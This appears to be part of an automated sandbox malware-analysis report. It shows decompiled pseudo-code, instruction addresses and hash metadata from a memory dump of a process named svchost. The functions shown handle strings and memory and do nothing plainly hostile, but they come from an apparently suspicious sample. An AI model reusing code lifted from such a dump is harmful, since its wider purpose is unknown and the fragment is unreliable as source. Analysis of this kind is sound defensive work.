                                                                                                                                                                                                                                                                      0x04020f0c
                                                                                                                                                                                                                                                                      0x04020f0f
                                                                                                                                                                                                                                                                      0x04020f13
                                                                                                                                                                                                                                                                      0x04020f20
                                                                                                                                                                                                                                                                      0x04020f26
                                                                                                                                                                                                                                                                      0x04020f2a
                                                                                                                                                                                                                                                                      0x04020f2f
                                                                                                                                                                                                                                                                      0x04020f32
                                                                                                                                                                                                                                                                      0x04020f35
                                                                                                                                                                                                                                                                      0x04020f3c
                                                                                                                                                                                                                                                                      0x04020f3c
                                                                                                                                                                                                                                                                      0x04020f40
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x04020f48
                                                                                                                                                                                                                                                                      0x04020f55
                                                                                                                                                                                                                                                                      0x04020f5f
                                                                                                                                                                                                                                                                      0x04020f64
                                                                                                                                                                                                                                                                      0x04020f67
                                                                                                                                                                                                                                                                      0x04020f67
                                                                                                                                                                                                                                                                      0x04020f6c
                                                                                                                                                                                                                                                                      0x04020f70
                                                                                                                                                                                                                                                                      0x04020f8a
                                                                                                                                                                                                                                                                      0x04020f8b
                                                                                                                                                                                                                                                                      0x04020f90
                                                                                                                                                                                                                                                                      0x04020f93
                                                                                                                                                                                                                                                                      0x04020f99
                                                                                                                                                                                                                                                                      0x04020fa2
                                                                                                                                                                                                                                                                      0x04020fa5
                                                                                                                                                                                                                                                                      0x04020fb7
                                                                                                                                                                                                                                                                      0x04020fba
                                                                                                                                                                                                                                                                      0x04020fbd
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x04020fce
                                                                                                                                                                                                                                                                      0x04020fd7
                                                                                                                                                                                                                                                                      0x04020fe0
                                                                                                                                                                                                                                                                      0x04020fe6
                                                                                                                                                                                                                                                                      0x04020fec
                                                                                                                                                                                                                                                                      0x04020ff8
                                                                                                                                                                                                                                                                      0x04020ffd
                                                                                                                                                                                                                                                                      0x04021006
                                                                                                                                                                                                                                                                      0x04021012
                                                                                                                                                                                                                                                                      0x0402101f
                                                                                                                                                                                                                                                                      0x04020fb1
                                                                                                                                                                                                                                                                      0x04020fb1
                                                                                                                                                                                                                                                                      0x04020fb4
                                                                                                                                                                                                                                                                      0x04020fb4
                                                                                                                                                                                                                                                                      0x0402102e
                                                                                                                                                                                                                                                                      0x04021034
                                                                                                                                                                                                                                                                      0x04021037
                                                                                                                                                                                                                                                                      0x0402103a
                                                                                                                                                                                                                                                                      0x04021040
                                                                                                                                                                                                                                                                      0x04021046
                                                                                                                                                                                                                                                                      0x0402104f
                                                                                                                                                                                                                                                                      0x04021058
                                                                                                                                                                                                                                                                      0x04021061
                                                                                                                                                                                                                                                                      0x04021066
                                                                                                                                                                                                                                                                      0x04021074
                                                                                                                                                                                                                                                                      0x04021079
                                                                                                                                                                                                                                                                      0x04021084
                                                                                                                                                                                                                                                                      0x0402108e
                                                                                                                                                                                                                                                                      0x04021097
                                                                                                                                                                                                                                                                      0x0402109a
                                                                                                                                                                                                                                                                      0x0402109a
                                                                                                                                                                                                                                                                      0x0402109c
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x04020f72
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x04020f15
                                                                                                                                                                                                                                                                      0x04020ed9
                                                                                                                                                                                                                                                                      0x04020ed9
                                                                                                                                                                                                                                                                      0x04020edd
                                                                                                                                                                                                                                                                      0x04020ee2
                                                                                                                                                                                                                                                                      0x04020ee9
                                                                                                                                                                                                                                                                      0x04020eee
                                                                                                                                                                                                                                                                      0x04020ef1
                                                                                                                                                                                                                                                                      0x04020ef1
                                                                                                                                                                                                                                                                      0x04020ef8
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x04020eaf
                                                                                                                                                                                                                                                                      0x040210a2
                                                                                                                                                                                                                                                                      0x040210a6
                                                                                                                                                                                                                                                                      0x040210ab
                                                                                                                                                                                                                                                                      0x040210b2
                                                                                                                                                                                                                                                                      0x040210ba
                                                                                                                                                                                                                                                                      0x040210ba
                                                                                                                                                                                                                                                                      0x040210c7
                                                                                                                                                                                                                                                                      0x040210c7
                                                                                                                                                                                                                                                                      0x00000000

                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000006.00000002.817211528.0000000004000000.00000040.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.817211528.000000000408A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_4000000_svchost.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: _strlen
                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                      • API String ID: 4218353326-0
                                                                                                                                                                                                                                                                      • Opcode ID: cc552e2788ec19ea4224f0d46fe881bc41ece34d1291b5b1bd72de5b41e52a96
                                                                                                                                                                                                                                                                      • Instruction ID: 6b2d4ef1dc70f01762c9ea93bfd451974196985589b21f9b2b8d381f5f98cc15
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: cc552e2788ec19ea4224f0d46fe881bc41ece34d1291b5b1bd72de5b41e52a96
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7791D8B4E00219DFDF44DF98D580AEEBBB1BF48318F248169E505B7381E735AA41CB56
                                                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                      C-Code - Quality: 79%
                                                                                                                                                                                                                                                                      			E04015C60(void* __ebx, intOrPtr __ecx, void* __edx, intOrPtr _a4) {
                                                                                                                                                                                                                                                                      				char _v5;
                                                                                                                                                                                                                                                                      				intOrPtr* _v12;
                                                                                                                                                                                                                                                                      				intOrPtr* _v16;
                                                                                                                                                                                                                                                                      				signed int _v20;
                                                                                                                                                                                                                                                                      				void _v52;
                                                                                                                                                                                                                                                                      				intOrPtr _v56;
                                                                                                                                                                                                                                                                      				intOrPtr _v60;
                                                                                                                                                                                                                                                                      				intOrPtr _v64;
                                                                                                                                                                                                                                                                      				intOrPtr _v68;
                                                                                                                                                                                                                                                                      				intOrPtr _v72;
                                                                                                                                                                                                                                                                      				intOrPtr _v76;
                                                                                                                                                                                                                                                                      				intOrPtr _v80;
                                                                                                                                                                                                                                                                      				intOrPtr _v84;
                                                                                                                                                                                                                                                                      				intOrPtr _v88;
                                                                                                                                                                                                                                                                      				void* __edi;
                                                                                                                                                                                                                                                                      				void* __esi;
                                                                                                                                                                                                                                                                      				void* _t107;
                                                                                                                                                                                                                                                                      				intOrPtr _t115;
                                                                                                                                                                                                                                                                      				signed char _t118;
                                                                                                                                                                                                                                                                      				signed char _t124;
                                                                                                                                                                                                                                                                      				void* _t126;
                                                                                                                                                                                                                                                                      				void* _t161;
                                                                                                                                                                                                                                                                      				signed int _t183;
                                                                                                                                                                                                                                                                      				void* _t184;
                                                                                                                                                                                                                                                                      
                                                                                                                                                                                                                                                                      				_t161 = __edx;
                                                                                                                                                                                                                                                                      				_t126 = __ebx;
                                                                                                                                                                                                                                                                      				_v20 =  *0x429024 ^ _t183;
                                                                                                                                                                                                                                                                      				_v76 = __ecx;
                                                                                                                                                                                                                                                                      				_v5 = 0;
                                                                                                                                                                                                                                                                      				while(_a4 != 0) {
                                                                                                                                                                                                                                                                      					_v12 = 0;
                                                                                                                                                                                                                                                                      					_v5 = 1;
                                                                                                                                                                                                                                                                      					do {
                                                                                                                                                                                                                                                                      						_t162 = _a4;
                                                                                                                                                                                                                                                                      						_v12 = E04013F50(_t126, _v76, 0x426eaa, 0x426e9c, _a4, 0, 0xffffffff, 0,  *(_v76 + 0x19) & 0x000000ff);
                                                                                                                                                                                                                                                                      						if(_v12 != 0) {
                                                                                                                                                                                                                                                                      							_v16 = E04015360(_t126, _v76, 0x426eaa, 0x426e9c, _v12);
                                                                                                                                                                                                                                                                      							if(_v16 == 0) {
                                                                                                                                                                                                                                                                      								if( *((intOrPtr*)(_v76 + 0xc)) == 0) {
                                                                                                                                                                                                                                                                      									_t115 = E04020CE0(8);
                                                                                                                                                                                                                                                                      									_t184 = _t184 + 4;
                                                                                                                                                                                                                                                                      									_v64 = _t115;
                                                                                                                                                                                                                                                                      									if(_v64 == 0) {
                                                                                                                                                                                                                                                                      										_v84 = 0;
                                                                                                                                                                                                                                                                      									} else {
                                                                                                                                                                                                                                                                      										_v84 = E0401F4E0(_v64);
                                                                                                                                                                                                                                                                      									}
                                                                                                                                                                                                                                                                      									_t162 = _v84;
                                                                                                                                                                                                                                                                      									 *((intOrPtr*)(_v76 + 0xc)) = _v84;
                                                                                                                                                                                                                                                                      								}
                                                                                                                                                                                                                                                                      								memcpy( &_v52, 0x426e9c, 7 << 2);
                                                                                                                                                                                                                                                                      								asm("movsb");
                                                                                                                                                                                                                                                                      								E0401F9F0(_t126,  *((intOrPtr*)(_v76 + 0xc)), _t162,  &_v52, 0x1c, 0);
                                                                                                                                                                                                                                                                      								E0401F9F0(_t126,  *((intOrPtr*)(_v76 + 0xc)), _v76, 0x426c50, 2, 0);
                                                                                                                                                                                                                                                                      								_t107 = E040070A0( *_v12);
                                                                                                                                                                                                                                                                      								_t184 = _t184 + 0x10;
                                                                                                                                                                                                                                                                      								E0401F9F0(_t126,  *((intOrPtr*)(_v76 + 0xc)), _v12,  *_v12, _t107, 0);
                                                                                                                                                                                                                                                                      								E0401F9F0(_t126,  *((intOrPtr*)(_v76 + 0xc)), _v76, 0x426c54, 2, 0);
                                                                                                                                                                                                                                                                      								E0401F9F0(_t126,  *((intOrPtr*)(_v76 + 0xc)), _v76, 0x426ebc, 4, 0);
                                                                                                                                                                                                                                                                      								 *(_v76 + 0x1a) = 1;
                                                                                                                                                                                                                                                                      							} else {
                                                                                                                                                                                                                                                                      								if( *_v16 == 0 ||  *((intOrPtr*)(_v16 + 4)) <= 0) {
                                                                                                                                                                                                                                                                      									_t118 = E0401F7C0(_t126, _a4, 0x426eaa, 0x426e9c,  *((intOrPtr*)(_v12 + 0x28)),  *((intOrPtr*)(_v12 + 0x2c)));
                                                                                                                                                                                                                                                                      									asm("sbb edx, edx");
                                                                                                                                                                                                                                                                      									 *(_v76 + 0x1a) =  ~(_t118 & 0x000000ff) + 1;
                                                                                                                                                                                                                                                                      								} else {
                                                                                                                                                                                                                                                                      									_t124 = E0401F6B0(_t126, _a4, 0x426eaa, 0x426e9c,  *((intOrPtr*)(_v12 + 0x28)),  *((intOrPtr*)(_v12 + 0x2c)),  *_v16,  *((intOrPtr*)(_v16 + 4)));
                                                                                                                                                                                                                                                                      									asm("sbb edx, edx");
                                                                                                                                                                                                                                                                      									 *(_v76 + 0x1a) =  ~(_t124 & 0x000000ff) + 1;
                                                                                                                                                                                                                                                                      								}
                                                                                                                                                                                                                                                                      								if(_v16 != 0) {
                                                                                                                                                                                                                                                                      									_v60 = _v16;
                                                                                                                                                                                                                                                                      									_v56 = _v60;
                                                                                                                                                                                                                                                                      									if(_v56 == 0) {
                                                                                                                                                                                                                                                                      										_v80 = 0;
                                                                                                                                                                                                                                                                      									} else {
                                                                                                                                                                                                                                                                      										_v80 = E04004EA0(_v56, 1);
                                                                                                                                                                                                                                                                      									}
                                                                                                                                                                                                                                                                      									_v16 = 0x666;
                                                                                                                                                                                                                                                                      								}
                                                                                                                                                                                                                                                                      							}
                                                                                                                                                                                                                                                                      							if(_v12 != 0) {
                                                                                                                                                                                                                                                                      								_v72 = _v12;
                                                                                                                                                                                                                                                                      								_v68 = _v72;
                                                                                                                                                                                                                                                                      								if(_v68 == 0) {
                                                                                                                                                                                                                                                                      									_v88 = 0;
                                                                                                                                                                                                                                                                      								} else {
                                                                                                                                                                                                                                                                      									_v88 = E04006780(_v68, 1);
                                                                                                                                                                                                                                                                      								}
                                                                                                                                                                                                                                                                      								_v12 = 0x666;
                                                                                                                                                                                                                                                                      							}
                                                                                                                                                                                                                                                                      						}
                                                                                                                                                                                                                                                                      					} while (_v12 != 0 && ( *(_v76 + 0x1a) & 0x000000ff) == 0);
                                                                                                                                                                                                                                                                      					asm("sbb ecx, ecx");
                                                                                                                                                                                                                                                                      					_v5 =  ~( *(_v76 + 0x1a) & 0x000000ff) + 1;
                                                                                                                                                                                                                                                                      					_t161 = 0;
                                                                                                                                                                                                                                                                      					if(0 != 0) {
                                                                                                                                                                                                                                                                      						continue;
                                                                                                                                                                                                                                                                      					}
                                                                                                                                                                                                                                                                      					L30:
                                                                                                                                                                                                                                                                      					return E04006C8C(_v5, _t126, _v20 ^ _t183, _t161, 0x426eaa, 0x426e9c);
                                                                                                                                                                                                                                                                      				}
                                                                                                                                                                                                                                                                      				goto L30;
                                                                                                                                                                                                                                                                      			}



























                                                                                                                                                                                                                                                                      0x04015c60
                                                                                                                                                                                                                                                                      0x04015c60
                                                                                                                                                                                                                                                                      0x04015c6d
                                                                                                                                                                                                                                                                      0x04015c72
                                                                                                                                                                                                                                                                      0x04015c75
                                                                                                                                                                                                                                                                      0x04015c79
                                                                                                                                                                                                                                                                      0x04015c84
                                                                                                                                                                                                                                                                      0x04015c8b
                                                                                                                                                                                                                                                                      0x04015c8f
                                                                                                                                                                                                                                                                      0x04015c9d
                                                                                                                                                                                                                                                                      0x04015ca9
                                                                                                                                                                                                                                                                      0x04015cb0
                                                                                                                                                                                                                                                                      0x04015cc2
                                                                                                                                                                                                                                                                      0x04015cc9
                                                                                                                                                                                                                                                                      0x04015d7c
                                                                                                                                                                                                                                                                      0x04015d80
                                                                                                                                                                                                                                                                      0x04015d85
                                                                                                                                                                                                                                                                      0x04015d88
                                                                                                                                                                                                                                                                      0x04015d8f
                                                                                                                                                                                                                                                                      0x04015d9e
                                                                                                                                                                                                                                                                      0x04015d91
                                                                                                                                                                                                                                                                      0x04015d99
                                                                                                                                                                                                                                                                      0x04015d99
                                                                                                                                                                                                                                                                      0x04015da8
                                                                                                                                                                                                                                                                      0x04015dab
                                                                                                                                                                                                                                                                      0x04015dab
                                                                                                                                                                                                                                                                      0x04015dbb
                                                                                                                                                                                                                                                                      0x04015dbd
                                                                                                                                                                                                                                                                      0x04015dcc
                                                                                                                                                                                                                                                                      0x04015de0
                                                                                                                                                                                                                                                                      0x04015ded
                                                                                                                                                                                                                                                                      0x04015df2
                                                                                                                                                                                                                                                                      0x04015e02
                                                                                                                                                                                                                                                                      0x04015e16
                                                                                                                                                                                                                                                                      0x04015e2a
                                                                                                                                                                                                                                                                      0x04015e32
                                                                                                                                                                                                                                                                      0x04015ccf
                                                                                                                                                                                                                                                                      0x04015cd5
                                                                                                                                                                                                                                                                      0x04015d26
                                                                                                                                                                                                                                                                      0x04015d30
                                                                                                                                                                                                                                                                      0x04015d38
                                                                                                                                                                                                                                                                      0x04015ce0
                                                                                                                                                                                                                                                                      0x04015cfe
                                                                                                                                                                                                                                                                      0x04015d08
                                                                                                                                                                                                                                                                      0x04015d10
                                                                                                                                                                                                                                                                      0x04015d10
                                                                                                                                                                                                                                                                      0x04015d3f
                                                                                                                                                                                                                                                                      0x04015d44
                                                                                                                                                                                                                                                                      0x04015d4a
                                                                                                                                                                                                                                                                      0x04015d51
                                                                                                                                                                                                                                                                      0x04015d62
                                                                                                                                                                                                                                                                      0x04015d53
                                                                                                                                                                                                                                                                      0x04015d5d
                                                                                                                                                                                                                                                                      0x04015d5d
                                                                                                                                                                                                                                                                      0x04015d69
                                                                                                                                                                                                                                                                      0x04015d69
                                                                                                                                                                                                                                                                      0x04015d70
                                                                                                                                                                                                                                                                      0x04015e3a
                                                                                                                                                                                                                                                                      0x04015e3f
                                                                                                                                                                                                                                                                      0x04015e45
                                                                                                                                                                                                                                                                      0x04015e4c
                                                                                                                                                                                                                                                                      0x04015e5d
                                                                                                                                                                                                                                                                      0x04015e4e
                                                                                                                                                                                                                                                                      0x04015e58
                                                                                                                                                                                                                                                                      0x04015e58
                                                                                                                                                                                                                                                                      0x04015e64
                                                                                                                                                                                                                                                                      0x04015e64
                                                                                                                                                                                                                                                                      0x04015e3a
                                                                                                                                                                                                                                                                      0x04015e6b
                                                                                                                                                                                                                                                                      0x04015e89
                                                                                                                                                                                                                                                                      0x04015e8e
                                                                                                                                                                                                                                                                      0x04015e91
                                                                                                                                                                                                                                                                      0x04015e93
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x04015e99
                                                                                                                                                                                                                                                                      0x04015eab
                                                                                                                                                                                                                                                                      0x04015eab
                                                                                                                                                                                                                                                                      0x00000000

                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000006.00000002.817211528.0000000004000000.00000040.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.817211528.000000000408A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_4000000_svchost.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: codecvt
                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                      • API String ID: 3662085145-0
                                                                                                                                                                                                                                                                      • Opcode ID: 02833dcf54a586269b43c7a5692cfb048f7b9c5c918048c8dbaad8ebd72bbd88
                                                                                                                                                                                                                                                                      • Instruction ID: 8b2e742d592aba65153c7364a6cd7b1473e8eb5661a5a9f51c834e1a389ae5c1
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 02833dcf54a586269b43c7a5692cfb048f7b9c5c918048c8dbaad8ebd72bbd88
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 87811A74E04218EFEB58DF94D894BADBBB2AF88318F148159E4057F3A1C775B986CB40
                                                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                      C-Code - Quality: 80%
                                                                                                                                                                                                                                                                      			E040126B0(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi) {
                                                                                                                                                                                                                                                                      				char _v8;
                                                                                                                                                                                                                                                                      				intOrPtr* _v12;
                                                                                                                                                                                                                                                                      				signed int _v16;
                                                                                                                                                                                                                                                                      				char _v20;
                                                                                                                                                                                                                                                                      				intOrPtr _v24;
                                                                                                                                                                                                                                                                      				intOrPtr _v28;
                                                                                                                                                                                                                                                                      				intOrPtr _v32;
                                                                                                                                                                                                                                                                      				intOrPtr _v36;
                                                                                                                                                                                                                                                                      				char _v40;
                                                                                                                                                                                                                                                                      				intOrPtr _v44;
                                                                                                                                                                                                                                                                      				void* _v48;
                                                                                                                                                                                                                                                                      				intOrPtr _v52;
                                                                                                                                                                                                                                                                      				intOrPtr _v56;
                                                                                                                                                                                                                                                                      				intOrPtr _v60;
                                                                                                                                                                                                                                                                      				intOrPtr _v64;
                                                                                                                                                                                                                                                                      				intOrPtr _v68;
                                                                                                                                                                                                                                                                      				intOrPtr _v72;
                                                                                                                                                                                                                                                                      				intOrPtr* _v76;
                                                                                                                                                                                                                                                                      				intOrPtr _v80;
                                                                                                                                                                                                                                                                      				intOrPtr _v84;
                                                                                                                                                                                                                                                                      				intOrPtr _t59;
                                                                                                                                                                                                                                                                      				intOrPtr _t69;
                                                                                                                                                                                                                                                                      				intOrPtr _t70;
                                                                                                                                                                                                                                                                      				void* _t72;
                                                                                                                                                                                                                                                                      				void* _t79;
                                                                                                                                                                                                                                                                      				void* _t101;
                                                                                                                                                                                                                                                                      				void* _t102;
                                                                                                                                                                                                                                                                      				signed int _t103;
                                                                                                                                                                                                                                                                      				void* _t104;
                                                                                                                                                                                                                                                                      				void* _t105;
                                                                                                                                                                                                                                                                      
                                                                                                                                                                                                                                                                      				_t102 = __esi;
                                                                                                                                                                                                                                                                      				_t101 = __edi;
                                                                                                                                                                                                                                                                      				_t79 = __ebx;
                                                                                                                                                                                                                                                                      				_v16 =  *0x429024 ^ _t103;
                                                                                                                                                                                                                                                                      				_v72 = __ecx;
                                                                                                                                                                                                                                                                      				_v8 = 0;
                                                                                                                                                                                                                                                                      				do {
                                                                                                                                                                                                                                                                      					_v40 =  *0x426f90;
                                                                                                                                                                                                                                                                      					_v36 =  *0x426f94;
                                                                                                                                                                                                                                                                      					_v32 =  *0x426f98;
                                                                                                                                                                                                                                                                      					_v28 =  *0x426f9c;
                                                                                                                                                                                                                                                                      					_v24 =  *0x426fa0;
                                                                                                                                                                                                                                                                      					_v20 =  *0x426fa4;
                                                                                                                                                                                                                                                                      					_t59 = E04020CE0(8);
                                                                                                                                                                                                                                                                      					_t104 = _t104 + 4;
                                                                                                                                                                                                                                                                      					_v52 = _t59;
                                                                                                                                                                                                                                                                      					if(_v52 == 0) {
                                                                                                                                                                                                                                                                      						_v76 = 0;
                                                                                                                                                                                                                                                                      					} else {
                                                                                                                                                                                                                                                                      						_v76 = E0401F4E0(_v52);
                                                                                                                                                                                                                                                                      					}
                                                                                                                                                                                                                                                                      					_v12 = _v76;
                                                                                                                                                                                                                                                                      					E0401FC90(_t79, _v12, _t101, _t102,  &_v40, 0x14);
                                                                                                                                                                                                                                                                      					_t99 = _v12;
                                                                                                                                                                                                                                                                      					if((E04015C60(_t79, _v72, _v12, _v12) & 0x000000ff) != 0) {
                                                                                                                                                                                                                                                                      						_v48 = 0;
                                                                                                                                                                                                                                                                      						_t99 = _v12;
                                                                                                                                                                                                                                                                      						_t69 = E0401BCB0(_t101, 3,  *_v12,  &_v48);
                                                                                                                                                                                                                                                                      						_t104 = _t104 + 0xc;
                                                                                                                                                                                                                                                                      						_v44 = _t69;
                                                                                                                                                                                                                                                                      						if(_v44 > 0) {
                                                                                                                                                                                                                                                                      							_t70 = E04020CE0(8);
                                                                                                                                                                                                                                                                      							_t105 = _t104 + 4;
                                                                                                                                                                                                                                                                      							_v56 = _t70;
                                                                                                                                                                                                                                                                      							if(_v56 == 0) {
                                                                                                                                                                                                                                                                      								_v80 = 0;
                                                                                                                                                                                                                                                                      							} else {
                                                                                                                                                                                                                                                                      								_v80 = E0401F4E0(_v56);
                                                                                                                                                                                                                                                                      							}
                                                                                                                                                                                                                                                                      							_v8 = _v80;
                                                                                                                                                                                                                                                                      							_t72 = E040070A0( *((intOrPtr*)( *_v48 + 4)));
                                                                                                                                                                                                                                                                      							_t104 = _t105 + 4;
                                                                                                                                                                                                                                                                      							_t99 = _v48;
                                                                                                                                                                                                                                                                      							E0401FC90(_t79, _v8, _t101, _t102,  *((intOrPtr*)( *_v48 + 4)), _t72);
                                                                                                                                                                                                                                                                      							if(_v48 != 0) {
                                                                                                                                                                                                                                                                      								_t99 = _v48;
                                                                                                                                                                                                                                                                      								_v60 = _v48;
                                                                                                                                                                                                                                                                      								E04020CC0(_v60);
                                                                                                                                                                                                                                                                      								_t104 = _t104 + 4;
                                                                                                                                                                                                                                                                      								_v48 = 0x666;
                                                                                                                                                                                                                                                                      							}
                                                                                                                                                                                                                                                                      						}
                                                                                                                                                                                                                                                                      					}
                                                                                                                                                                                                                                                                      					if(_v12 != 0) {
                                                                                                                                                                                                                                                                      						_v68 = _v12;
                                                                                                                                                                                                                                                                      						_t99 = _v68;
                                                                                                                                                                                                                                                                      						_v64 = _v68;
                                                                                                                                                                                                                                                                      						if(_v64 == 0) {
                                                                                                                                                                                                                                                                      							_v84 = 0;
                                                                                                                                                                                                                                                                      						} else {
                                                                                                                                                                                                                                                                      							_v84 = E04004EA0(_v64, 1);
                                                                                                                                                                                                                                                                      						}
                                                                                                                                                                                                                                                                      						_v12 = 0x666;
                                                                                                                                                                                                                                                                      					}
                                                                                                                                                                                                                                                                      				} while (0 != 0);
                                                                                                                                                                                                                                                                      				return E04006C8C(_v8, _t79, _v16 ^ _t103, _t99, _t101, _t102);
                                                                                                                                                                                                                                                                      			}

































                                                                                                                                                                                                                                                                      0x040126b0
                                                                                                                                                                                                                                                                      0x040126b0
                                                                                                                                                                                                                                                                      0x040126b0
                                                                                                                                                                                                                                                                      0x040126bd
                                                                                                                                                                                                                                                                      0x040126c0
                                                                                                                                                                                                                                                                      0x040126c3
                                                                                                                                                                                                                                                                      0x040126ca
                                                                                                                                                                                                                                                                      0x040126cf
                                                                                                                                                                                                                                                                      0x040126d8
                                                                                                                                                                                                                                                                      0x040126e1
                                                                                                                                                                                                                                                                      0x040126e9
                                                                                                                                                                                                                                                                      0x040126f2
                                                                                                                                                                                                                                                                      0x040126fb
                                                                                                                                                                                                                                                                      0x04012700
                                                                                                                                                                                                                                                                      0x04012705
                                                                                                                                                                                                                                                                      0x04012708
                                                                                                                                                                                                                                                                      0x0401270f
                                                                                                                                                                                                                                                                      0x0401271e
                                                                                                                                                                                                                                                                      0x04012711
                                                                                                                                                                                                                                                                      0x04012719
                                                                                                                                                                                                                                                                      0x04012719
                                                                                                                                                                                                                                                                      0x04012728
                                                                                                                                                                                                                                                                      0x04012734
                                                                                                                                                                                                                                                                      0x04012739
                                                                                                                                                                                                                                                                      0x0401274a
                                                                                                                                                                                                                                                                      0x04012750
                                                                                                                                                                                                                                                                      0x0401275b
                                                                                                                                                                                                                                                                      0x04012763
                                                                                                                                                                                                                                                                      0x04012768
                                                                                                                                                                                                                                                                      0x0401276b
                                                                                                                                                                                                                                                                      0x04012772
                                                                                                                                                                                                                                                                      0x04012776
                                                                                                                                                                                                                                                                      0x0401277b
                                                                                                                                                                                                                                                                      0x0401277e
                                                                                                                                                                                                                                                                      0x04012785
                                                                                                                                                                                                                                                                      0x04012794
                                                                                                                                                                                                                                                                      0x04012787
                                                                                                                                                                                                                                                                      0x0401278f
                                                                                                                                                                                                                                                                      0x0401278f
                                                                                                                                                                                                                                                                      0x0401279e
                                                                                                                                                                                                                                                                      0x040127aa
                                                                                                                                                                                                                                                                      0x040127af
                                                                                                                                                                                                                                                                      0x040127b3
                                                                                                                                                                                                                                                                      0x040127bf
                                                                                                                                                                                                                                                                      0x040127c8
                                                                                                                                                                                                                                                                      0x040127ca
                                                                                                                                                                                                                                                                      0x040127cd
                                                                                                                                                                                                                                                                      0x040127d4
                                                                                                                                                                                                                                                                      0x040127d9
                                                                                                                                                                                                                                                                      0x040127dc
                                                                                                                                                                                                                                                                      0x040127dc
                                                                                                                                                                                                                                                                      0x040127c8
                                                                                                                                                                                                                                                                      0x04012772
                                                                                                                                                                                                                                                                      0x040127e7
                                                                                                                                                                                                                                                                      0x040127ec
                                                                                                                                                                                                                                                                      0x040127ef
                                                                                                                                                                                                                                                                      0x040127f2
                                                                                                                                                                                                                                                                      0x040127f9
                                                                                                                                                                                                                                                                      0x0401280a
                                                                                                                                                                                                                                                                      0x040127fb
                                                                                                                                                                                                                                                                      0x04012805
                                                                                                                                                                                                                                                                      0x04012805
                                                                                                                                                                                                                                                                      0x04012811
                                                                                                                                                                                                                                                                      0x04012811
                                                                                                                                                                                                                                                                      0x04012818
                                                                                                                                                                                                                                                                      0x04012830

                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      • std::_Iterator_base::_Iterator_base.LIBCPMTD ref: 04012714
                                                                                                                                                                                                                                                                      • std::_Iterator_base::_Iterator_base.LIBCPMTD ref: 0401278A
                                                                                                                                                                                                                                                                      • _strlen.LIBCMT ref: 040127AA
                                                                                                                                                                                                                                                                      • codecvt.LIBCPMTD ref: 04012800
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000006.00000002.817211528.0000000004000000.00000040.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.817211528.000000000408A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_4000000_svchost.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: Iterator_baseIterator_base::_std::_$_strlencodecvt
                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                      • API String ID: 4053968246-0
                                                                                                                                                                                                                                                                      • Opcode ID: 169dd0bcd0e1bc8557198bf3e789645acc63f33ee09107aa3db1908fa965f152
                                                                                                                                                                                                                                                                      • Instruction ID: af42a25bd155b3b5d7a86e069f6b5acb66482dcb96fdedbe39403f86dc1ab7a6
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 169dd0bcd0e1bc8557198bf3e789645acc63f33ee09107aa3db1908fa965f152
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4951D6B4E01208AFEB14DFA4E984BEEBBB1BF48308F108169E815B73A0D7716945CF55
                                                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                                                                                                                                      			E04014EC0(intOrPtr __ecx) {
                                                                                                                                                                                                                                                                      				intOrPtr _v8;
                                                                                                                                                                                                                                                                      				intOrPtr _v12;
                                                                                                                                                                                                                                                                      				intOrPtr _v16;
                                                                                                                                                                                                                                                                      				intOrPtr _v20;
